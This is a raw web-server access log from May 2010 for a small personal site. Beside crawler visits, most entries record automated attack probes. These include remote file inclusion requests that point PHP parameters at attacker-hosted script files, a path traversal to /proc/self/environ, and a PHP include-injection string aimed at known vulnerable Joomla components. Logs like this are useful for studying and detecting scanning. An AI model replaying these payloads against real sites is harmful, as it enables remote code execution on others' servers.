109.166.133.81 - - [06/May/2010:07:59:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
109.166.133.81 - - [06/May/2010:08:00:06 -0500] "GET /logs/access_log.1270512000 HTTP/1.1" 200 675172 "http://tomdolan.pconline.com/logs/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
207.46.199.200 - - [06/May/2010:08:03:16 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.13.159.138 - - [06/May/2010:08:03:52 -0500] "GET /logs//index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
212.13.159.138 - - [06/May/2010:08:03:55 -0500] "GET //index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
65.163.88.107 - - [06/May/2010:08:06:47 -0500] "GET /?INCLUDE_FOLDER=http://christenplein.com/id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
65.163.88.107 - - [06/May/2010:08:06:47 -0500] "GET /logs/?INCLUDE_FOLDER=http://christenplein.com/id1.txt??? HTTP/1.1" 200 4495 "-""Mozilla/5.0"
65.163.88.107 - - [06/May/2010:08:06:47 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://christenplein.com/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.163.88.107 - - [06/May/2010:08:07:10 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://christenplein.com/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.46.199.40 - - [06/May/2010:08:08:52 -0500] "GET /logs/access_log.1177200000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.30.142.216 - - [06/May/2010:08:13:32 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [06/May/2010:08:13:32 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [06/May/2010:08:13:44 -0500] "GET /logs/access_log.1248739200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
38.101.148.126 - - [06/May/2010:08:19:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [06/May/2010:08:19:26 -0500] "GET /logs/access_log.1207267200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [06/May/2010:08:19:33 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
121.190.102.21 - - [06/May/2010:08:20:33 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:08:20:33 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:08:20:33 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
38.101.148.126 - - [06/May/2010:08:22:05 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
99.39.2.249 - - [06/May/2010:08:24:18 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.ietvm.in/shiro-id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:08:24:21 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.ietvm.in/shiro-id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:08:24:21 -0500] "GET /logs/access_log.1264723200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.ietvm.in/shiro-id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:08:27:00 -0500] "GET /logs/access_log.1264723200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.ietvm.in/shiro-id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:08:27:03 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.ietvm.in/shiro-id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:08:27:03 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.ietvm.in/shiro-id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:08:27:31 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:08:27:32 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:08:27:32 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.129.119.43 - - [06/May/2010:08:34:11 -0500] "GET /logs/?S=A HTTP/1.1" 200 4495 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
65.55.51.110 - - [06/May/2010:08:34:49 -0500] "GET /logs/access_log.1177718400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:08:36:35 -0500] "GET /logs/access_log.1235865600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.49.100.254 - - [06/May/2010:08:41:53 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:08:41:53 -0500] "GET /logs/access_log.1264723200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:08:41:53 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:08:41:54 -0500] "GET /logs/access_log.1266019200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:42:09 -0500] "GET /logs///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:42:09 -0500] "GET /logs/access_log.1263859200///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:42:09 -0500] "GET ///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:42:09 -0500] "GET /logs/access_log.1262476800///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:42:11 -0500] "GET /logs/access_log.1262476800///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:42:11 -0500] "GET /logs///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:42:12 -0500] "GET /logs/access_log.1263859200///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:42:12 -0500] "GET ///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
207.46.199.185 - - [06/May/2010:08:42:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.94.28.54 - - [06/May/2010:08:46:12 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 4192 "-""-"
211.239.161.143 - - [06/May/2010:08:48:52 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.239.161.143 - - [06/May/2010:08:48:52 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.239.161.143 - - [06/May/2010:08:48:53 -0500] "GET /logs/access_log.1266451200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:08:48:57 -0500] "GET /logs/access_log.1218326400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
78.110.50.139 - - [06/May/2010:08:50:01 -0500] "GET /logs//index.php?option=com_videodb&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
78.110.50.139 - - [06/May/2010:08:50:02 -0500] "GET //index.php?option=com_videodb&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
200.62.142.217 - - [06/May/2010:08:50:19 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
200.62.142.217 - - [06/May/2010:08:50:19 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
200.62.142.217 - - [06/May/2010:08:50:19 -0500] "GET /logs/access_log.1270512000//blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
200.62.142.217 - - [06/May/2010:08:50:32 -0500] "GET /logs/access_log.1264723200//blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
200.62.142.217 - - [06/May/2010:08:50:32 -0500] "GET /logs/access_log.1262390400//blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:50:34 -0500] "GET ///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:50:34 -0500] "GET /logs/access_log.1262476800///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:50:34 -0500] "GET /logs///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:50:34 -0500] "GET /logs/access_log.1263859200///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:50:34 -0500] "GET /logs/access_log.1262476800///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:50:34 -0500] "GET ///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:50:34 -0500] "GET /logs///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:50:34 -0500] "GET /logs/access_log.1263859200///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
200.62.142.217 - - [06/May/2010:08:50:57 -0500] "GET /logs/access_log.1263427200//blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:55:33 -0500] "GET /logs///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:55:33 -0500] "GET ///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:55:33 -0500] "GET /logs/access_log.1262476800///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:08:55:47 -0500] "GET /logs/access_log.1263859200///include.php?path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.199.54 - - [06/May/2010:08:56:52 -0500] "GET /costume/costume1.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.165 - - [06/May/2010:08:56:59 -0500] "GET /logs/access_log.1242259200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
99.39.2.249 - - [06/May/2010:09:11:35 -0500] "GET /ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:11:36 -0500] "GET /logs/access_log.1247270400/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:11:37 -0500] "GET /logs/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:12:08 -0500] "GET /logs/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:12:11 -0500] "GET /ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:12:11 -0500] "GET /logs/access_log.1247270400/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:12:36 -0500] "GET /logs/access_log.1247270400/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:12:37 -0500] "GET /logs/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:12:37 -0500] "GET /ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:12:40 -0500] "GET /ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:12:40 -0500] "GET /logs/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:12:40 -0500] "GET /logs/access_log.1247270400/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:12:45 -0500] "GET /logs/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:12:47 -0500] "GET /logs/access_log.1247270400/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:12:47 -0500] "GET /ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:12:48 -0500] "GET /logs/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:12:49 -0500] "GET /ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:12:49 -0500] "GET /logs/access_log.1247270400/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:13:02 -0500] "GET /ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:13:02 -0500] "GET /logs/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:13:02 -0500] "GET /logs/access_log.1247270400/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:13:35 -0500] "GET /logs/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:13:40 -0500] "GET /ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:09:13:47 -0500] "GET /logs/access_log.1247270400/ashheadlines.php?pathtoashnews=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
217.149.62.1 - - [06/May/2010:09:15:30 -0500] "GET //include.php?path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 296 "-""Mozilla/5.0"
217.149.62.1 - - [06/May/2010:09:15:30 -0500] "GET /logs/access_log.1263859200//include.php?path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.149.62.1 - - [06/May/2010:09:15:30 -0500] "GET /logs/access_log.1262476800//include.php?path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.149.62.1 - - [06/May/2010:09:15:30 -0500] "GET /logs//include.php?path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
217.149.62.1 - - [06/May/2010:09:16:05 -0500] "GET /logs/access_log.1265414400//include.php?path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.149.62.1 - - [06/May/2010:09:16:19 -0500] "GET /logs/access_log.1262476800//include.php?path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.149.62.1 - - [06/May/2010:09:16:19 -0500] "GET //include.php?path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 296 "-""Mozilla/5.0"
217.149.62.1 - - [06/May/2010:09:16:19 -0500] "GET /logs//include.php?path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
217.149.62.1 - - [06/May/2010:09:16:19 -0500] "GET /logs/access_log.1263859200//include.php?path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.149.62.1 - - [06/May/2010:09:16:54 -0500] "GET /logs/access_log.1265414400//include.php?path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.105.40.177 - - [06/May/2010:09:17:55 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""WebRingChecker/1.71 LWP/5.79"
124.49.100.254 - - [06/May/2010:09:22:39 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:09:23:04 -0500] "GET /logs/access_log.1264723200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:09:23:04 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:09:23:04 -0500] "GET /logs/access_log.1266019200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
207.46.204.233 - - [06/May/2010:09:23:23 -0500] "GET /logs/access_log.1203292800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:09:25:59 -0500] "GET /logs/access_log.1270080000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.120.52.237 - - [06/May/2010:09:30:43 -0500] "GET / HTTP/1.1" 200 1003 "-""Java/1.6.0_04"
217.96.120.42 - - [06/May/2010:09:31:28 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 4500 "-""Mozilla/5.0"
217.96.120.42 - - [06/May/2010:09:31:28 -0500] "GET /logs/access_log.1266710400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.96.120.42 - - [06/May/2010:09:31:28 -0500] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
217.96.120.42 - - [06/May/2010:09:31:31 -0500] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
217.96.120.42 - - [06/May/2010:09:31:32 -0500] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
217.96.120.42 - - [06/May/2010:09:31:32 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 4500 "-""Mozilla/5.0"
217.96.120.42 - - [06/May/2010:09:31:32 -0500] "GET /logs/access_log.1266710400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.96.120.42 - - [06/May/2010:09:31:35 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 4500 "-""Mozilla/5.0"
217.96.120.42 - - [06/May/2010:09:31:35 -0500] "GET /logs/access_log.1266710400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.175.97.18 - - [06/May/2010:09:31:42 -0500] "GET /logs/access_log.1262390400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.175.97.18 - - [06/May/2010:09:31:42 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 4500 "-""Mozilla/5.0"
69.175.97.18 - - [06/May/2010:09:31:42 -0500] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
217.96.120.42 - - [06/May/2010:09:31:45 -0500] "GET /logs/access_log.1266710400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.96.120.42 - - [06/May/2010:09:31:45 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 4500 "-""Mozilla/5.0"
217.96.120.42 - - [06/May/2010:09:31:45 -0500] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
216.129.119.41 - - [06/May/2010:09:31:46 -0500] "GET /logs/access_log.1247875200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
69.175.97.18 - - [06/May/2010:09:31:49 -0500] "GET /logs/access_log.1262390400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.175.97.18 - - [06/May/2010:09:31:49 -0500] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
69.175.97.18 - - [06/May/2010:09:31:49 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 4500 "-""Mozilla/5.0"
69.175.97.18 - - [06/May/2010:09:31:50 -0500] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
69.175.97.18 - - [06/May/2010:09:31:50 -0500] "GET /logs/access_log.1262390400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.175.97.18 - - [06/May/2010:09:31:50 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 4500 "-""Mozilla/5.0"
69.175.97.18 - - [06/May/2010:09:31:52 -0500] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
